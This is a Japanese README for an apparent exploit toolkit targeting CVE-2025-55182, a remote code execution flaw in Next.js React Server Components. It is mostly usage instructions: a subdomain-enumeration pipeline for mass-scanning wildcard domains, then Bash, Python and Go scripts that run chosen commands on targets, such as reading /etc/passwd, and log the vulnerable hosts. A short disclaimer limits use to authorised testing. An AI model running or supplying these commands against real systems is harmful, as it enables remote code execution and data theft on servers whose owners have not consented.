
多言語スキャナー:Next.js React Server ComponentsにおけるCVE-2025-55182 RCEのための、単一/大量スキャンモードと統合バグバウンティ偵察ワークフローを備えたツール。
Next.jsアプリケーション(React Server Components使用)における深刻なリモートコード実行(RCE)の脆弱性 CVE-2025-55182 を検出・悪用するための包括的ツールキットです。
このリポジトリには、統合Bashスキャナー(シングルモード&マスモード)、Python/Go実装、およびバグ報奨金偵察ワークフローが含まれています。

ワイルドカードドメインを大量に調査する場合は、以下のパイプラインでターゲットを絞り込んでからスキャンしてください:
# 1. サブドメインの列挙
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. ライブホストのフィルタリング
httpx -l subs.txt -o live.txt
# 3. Nucleiによる事前スキャン検出(オプション)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
scanner.sh スクリプトは、シングルターゲットスキャン および ファイルリストからのマススキャン をサポートします。
chmod +x scanner.sh
特定のターゲットを冗長出力で確認するのに最適です。
# 基本チェック(デフォルトは "id")
./scanner.sh -d example.com
# カスタムコマンドの実行
./scanner.sh -d https://target.com -c "cat /etc/passwd"
URLリストを効率的にスキャンし、脆弱なホストをファイルに保存します。
# URLリストをスキャン
./scanner.sh -l live.txt -c "whoami"
# カスタム出力ファイル
./scanner.sh -l live.txt -o my_bounty.txt
Bashでの特殊文字エスケープに問題がある場合はこちらを使用してください。
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
高性能、最小限の依存関係。
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
このツールは教育目的および承認されたセキュリティテストのみを目的としています。 無許可での使用は固く禁じられています。 開発者は、このプログラムの誤用または損害について一切の責任を負いません。
NVD CVEの詳細: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
React セキュリティアドバイザリ(React Server Componentsの脆弱性): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
ProjectDiscovery Nucleiテンプレート: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| フラグ | 説明 |
|---|
-d, --domain | シングルターゲットURL |
-l, --list | URLリストを含むファイル |
-c, --command | 実行するコマンド(デフォルト: id) |
-o, --output | 脆弱ホストの出力ファイル(デフォルト: vulnerable_hosts.txt) |